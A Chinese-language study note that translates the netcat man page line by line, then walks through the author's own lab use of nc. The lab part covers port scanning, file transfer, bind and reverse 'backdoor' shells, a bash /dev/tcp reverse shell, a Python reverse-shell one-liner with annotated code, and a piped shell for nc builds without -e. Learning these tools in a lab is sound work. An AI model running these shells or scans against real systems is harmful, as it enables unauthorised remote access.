后面有一些实例
"""
NC(1) General Commands Manual 通用命令手册
NAME
nc - TCP/IP swiss army knife TCP/IP瑞士军刀
SYNOPSIS 概要
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION 描述
netcat is a simple unix utility which reads and writes data across net‐
work connections, using TCP or UDP protocol. It is designed to be a re‐
liable "back-end" tool that can be used directly or easily driven by
other programs and scripts. At the same time, it is a feature-rich
network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in
capabilities. Netcat, or "nc" as the actual program is named, should
have been supplied long ago as another one of those cryptic but stan‐
dard Unix tools.
Netcat是一个简单的Unix实用程序,它使用TCP或UDP协议跨网络连接读取和写入数据。
它被设计成一个可靠的“后端”工具,可以直接使用,也可以很容易地由其他程序和脚本驱动。
同时它是一个功能丰富的网络调试和探索工具,因为它可以创建您需要的几乎任何类型的连接,
并且具有几个有趣的内置功能。Netcat,或实际程序名为“NC”,
早就应该作为另一种神秘但标准的Unix工具提供。
In the simplest usage, "nc host port" creates a TCP connection to the
given port on the given target host. Your standard input is then sent
to the host, and anything that comes back across the connection is sent
to your standard output. This continues indefinitely, until the net‐
work side of the connection shuts down. Note that this behavior is
different from most other applications which shut everything down and
exit after an end-of-file on the standard input.
在最简单的用法中,“nc host port”创建到给定目标主机上给定端口的TCP连接。
然后将标准输入发送到主机,并且通过连接返回的任何内容都将发送到标准输出。
这将无限期地持续下去,直到连接的网络端关闭。请注意,此行为与大多数其他应用程序不同,
这些应用程序在标准输入的文件结束后关闭所有内容并退出。
Netcat can also function as a server, by listening for inbound connec‐
tions on arbitrary ports and then doing the same reading and writing.
With minor limitations, netcat doesn't really care if it runs in
"client" or "server" mode -- it still shovels data back and forth until
there isn't any more left. In either mode, shutdown can be forced after
a configurable time of inactivity on the network side.
Netcat还可以充当服务器,通过侦听任意端口上的入站连接,然后进行相同的读取和写入。
由于有一些小的限制,Netcat并不真正关心它是在“客户端”模式还是“服务器”模式下运行——
它仍然来回推送数据,直到没有更多的数据留下。
在任一模式下,都可以在网络侧可配置的不活动时间后强制关机。
And it can do this via UDP too, so netcat is possibly the "udp telnet-
like" application you always wanted for testing your UDP-mode servers.
UDP, as the "U" implies, gives less reliable data transmission than TCP
connections and some systems may have trouble sending large amounts of
data that way, but it's still a useful capability to have.
而且它也可以通过UDP做到这一点,所以Netcat可能是您一直希望用于测试UDP模式服务器
的“UDP telnetlike”应用程序。
正如“U”所示,UDP提供的数据传输不如TCP连接可靠,一些系统可能无法以这种方式发送
大量数据,但它仍然是一种有用的功能。
You may be asking "why not just use telnet to connect to arbitrary
ports?" Valid question, and here are some reasons. Telnet has the
"standard input EOF" problem, so one must introduce calculated delays
in driving scripts to allow network output to finish. This is the main
reason netcat stays running until the *network* side closes. Telnet
also will not transfer arbitrary binary data, because certain charac‐
ters are interpreted as telnet options and are thus removed from the
data stream. Telnet also emits some of its diagnostic messages to
standard output, where netcat keeps such things religiously separated
from its *output* and will never modify any of the real data in transit
unless you *really* want it to. And of course telnet is incapable of
listening for inbound connections, or using UDP instead. Netcat
doesn't have any of these limitations, is much smaller and faster than
telnet, and has many other advantages.
您可能会问“为什么不直接使用telnet连接到任意端口?”有效的问题,这里有一些原因。
Telnet存在“标准输入EOF”问题,因此必须在驱动脚本中引入计算延迟,以便完成网络输出。
这是Netcat保持运行直到*network*端关闭的主要原因。Telnet也不会传输任意二进制数据,
因为某些字符被解释为telnet选项,因此会从数据流中删除。Telnet还会将一些诊断消息
发送到标准输出,在标准输出中,Netcat会将这些信息与其*输出*严格分开,并且除非
您*真的*想要修改,否则永远不会修改传输中的任何真实数据。当然,telnet不能侦听入站连接,
也不能使用UDP。Netcat没有任何这些限制,它比telnet小得多,速度也快得多,还有很多其他优势。
OPTIONS
-c string specify shell commands to exec after connect (use with
字符串 caution). The string is passed to /bin/sh -c for execu‐
tion. See the -e option if you don't have a working
/bin/sh (Note that POSIX-conformant system must have one).
在连接后指定要执行的shell命令(谨慎使用)。 该字符串将传递给
/bin/sh -c以供执行。 如果没有工作/bin/sh,请参阅-e选项
(请注意,符合POSIX的系统必须具有一个)。
-e filename specify filename to exec after connect (use with caution).
文件名 See the -c option for enhanced functionality.
filename指定连接后exec的文件名(请谨慎使用)。有关增强功能,请参阅-c选项。
-g gateway source-routing hop point[s], up to 8
网关 源路由跳跃点[s],最多8个
-G num source-routing pointer: 4, 8, 12, ...
数字 源路由指针
-h display help
显示帮助
-i secs delay interval for lines sent, ports scanned
秒 发送每一行数据或端口扫描的延迟间隔
-l listen mode, for inbound connects
-L 可以在客户端结束连接的时候继续监听
监听模式,用于入站连接
-n numeric-only IP addresses, no DNS
仅限数字的IP地址,没有DNS
-o file hex dump of traffic 十六进制展示
-p port local port number (port numbers can be individual or
ranges: lo-hi [inclusive])
本地端口号(端口号可以是单个的或范围:lo-hi [包含])
-q seconds after EOF on stdin, wait the specified number of seconds
秒 and then quit. If seconds is negative, wait forever.
在标准输入上执行EOF后,等待指定的秒数然后退出。 如果秒是负数,则永远等待。
-b allow UDP broadcasts 允许UDP广播
-r randomize local and remote ports 随机化本地和远程端口,随便开的端口监听吧
-s addr local source address 本地源地址,用来欺骗
-t enable telnet negotiation 启用telnet协商
-u UDP mode UDP模式
-v verbose [use twice to be more verbose] 详细[使用两次更详细]
-w secs timeout for connects and final net reads 连接超时和最终网络读取
-C Send CRLF as line-ending 将CRLF作为行尾发送
-z zero-I/O mode [used for scanning] 零I / O模式[用于扫描]
-T type set TOS flag (type may be one of "Minimize-Delay", "Maxi‐
mize-Throughput", "Maximize-Reliability", or "Minimize-
Cost".)
设置TOS标志(类型可以是“最小化延迟”,“最大化吞吐量”,
“最大化可靠性”或“最小化成本”之一。)
COPYRIGHT 版权
Netcat is entirely my own creation, although plenty of other code was
used as examples. It is freely given away to the Internet community in
the hope that it will be useful, with no restrictions except giving
credit where it is due. No GPLs, Berkeley copyrights or any of that
nonsense. The author assumes NO responsibility for how anyone uses it.
If netcat makes you rich somehow and you're feeling generous, mail me a
check. If you are affiliated in any way with Microsoft Network, get a
life. Always ski in control. Comments, questions, and patches to hob‐
bit@avian.org.
尽管使用了大量其他代码作为示例,但Netcat完全是我自己的创建。
它是免费赠送给互联网社区的,希望它有用,没有任何限制,除非给予应有的信用。
没有GPL,伯克利版权或任何废话。 作者对任何人使用它不承担任何责任。
如果netcat以某种方式使你富有并且你很慷慨,请给我发一张支票。
如果您以任何方式加入Microsoft Network获得生命。 总是控制滑雪。
hobbit@avian.org的评论,问题和补丁。
NOTES 笔记
Some port names in /etc/services contain hyphens -- netcat currently
will not correctly parse those unless you escape the hyphens with back‐
slashes (e.g. "netcat localhost 'ftp\-data'").
/etc/services中的某些端口名称包含连字符 - 除非您使用反斜杠转义连字符
(例如“netcat localhost'ftp \-data'”),否则netcat当前将无法正确解析这些连字符。
BUGS
Efforts have been made to have netcat "do the right thing" in all its
various modes. If you believe that it is doing the wrong thing under
whatever circumstances, please notify me and tell me how you think it
should behave. If netcat is not able to do some task you think up, mi‐
nor tweaks to the code will probably fix that. It provides a basic and
easily-modified template for writing other network applications, and I
certainly encourage people to make custom mods and send in any improve‐
ments they make to it. Continued feedback from the Internet community
is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <joeyh@debian.org> and Robert
Woodcock <rcw@debian.org>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <hobbit@avian.org>.
NC(1)
下载地址:https://eternallybored.org/misc/netcat/
附上一些simple(windows-64):
- 开启服务端:
打开一个窗口
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(同意防火墙选项)这个时候服务的已经开启了
- 连接到服务端
然后再打开一个窗口输入
# 请以自己的ip为准
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
这个时候虽然没有回显和提示但是已经连接成功了,随便输入点东西
客户端发的消息会被服务端输出,服务端发送的消息会被客户端输出
- 开启一个shell服务端
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- 连接上去
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [汾 10.0.17134.885]
(c) 2018 Microsoft CorporationȨ
F:\SecTools\apps\netcat-win32-1.12>
连接上去之后直接返回了一个命令行(为了换个路径,我使用了linux版的nc)
F:\SecTools\apps\netcat-win32-1.12>dir
dir
F еľ ʱ
к 1646-F9AD
F:\SecTools\apps\netcat-win32-1.12 Ŀ¼
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
12 ļ 287,714 ֽ
2 Ŀ¼ 199,469,047,808 ֽ
F:\SecTools\apps\netcat-win32-1.12>
可以直接执行命令(但是这中文乱码很头疼)看来以后还是windows连windows,linux连linux吧
- 传输文件
服务端接受文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
客户端发送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
虽然两边都没啥反应,但是传输已经完成了
为什么windows的要用绝对路径啊
linux发送端好像也要绝对路径???
客户端接收文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
服务器端发送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
可以使用-w5 这样的参数设置等待时间,如果网络延迟超过5s还没连接好,那么结束命令
image.png
这个扫描端口windows版nc的扫描速度真是绝了,扫完感觉人都凉了
ubuntu上的也不行
但是kali-linux上的nc就非常厉害了
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
扫描一次全端口竟然没用2分钟
image.png
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
有些服务不回复banner信息
- 建立监听型后门
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
- 建立连接型后门(反弹型)
自己服务端开启监听
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
客户端连接
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
客户端连接上去以后,服务端拿到了命令行终端
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation。保留所有权利。
F:\SecTools\apps\netcat-win32-1.12>
image.png
windows端开启服务
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
kali连接
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
虽然没啥返回,但是已经返回shell了,可以直接运行命令(输入错误的命令你这边是看不到提示的,真是奇怪),有些linux的nc是没有-e选项的比如ubuntu
使用 -d 参数让nc在后台运行
-
端口转发
A想连接C,但直接连接是不行的,然后使用B进行转发
image.png
image.png
-
无nc的linux机器反弹bash shell
kali开启nc服务端(防火墙关了)
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
然后Ubuntu输入命令
sanqiushu@sanqiushu-VirtualBox:~$ bash -i >& /dev/tcp/10.20.2.185/4444 0>&1
kali就接收到了shell
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35130
sanqiushu@sanqiushu-VirtualBox:~$ ls
ls
vulhub
公共的
模板
视频
图片
文档
下载
音乐
桌面
sanqiushu@sanqiushu-VirtualBox:~$
image.png
-
无nc的linux机器建立python shell
kali建立nc服务端
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Ubuntu建立python客户端
sanqiushu@sanqiushu-VirtualBox:~$ python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
kali接受到信息
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35144
sanqiushu@sanqiushu-VirtualBox:~$ ls
vulhub
公共的
模板
视频
图片
文档
下载
音乐
桌面
sanqiushu@sanqiushu-VirtualBox:~$
python2代码
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.20.2.185',4444)) # 建立一个远程连接s ip和端口按需修改
os.dup2(s.fileno(),0) # 把输入重定向到s的文件描述符
os.dup2(s.fileno(),1) # 把输出重定向到s的文件描述符
os.dup2(s.fileno(),2) # 把错误输出重定向到s的文件描述符
p=subprocess.call(['/bin/bash','-i'])
之后再用python代码创建一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
-
不支持-e选项的nc 反弹shell
nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445
image.png
比较慢,大概等了10s
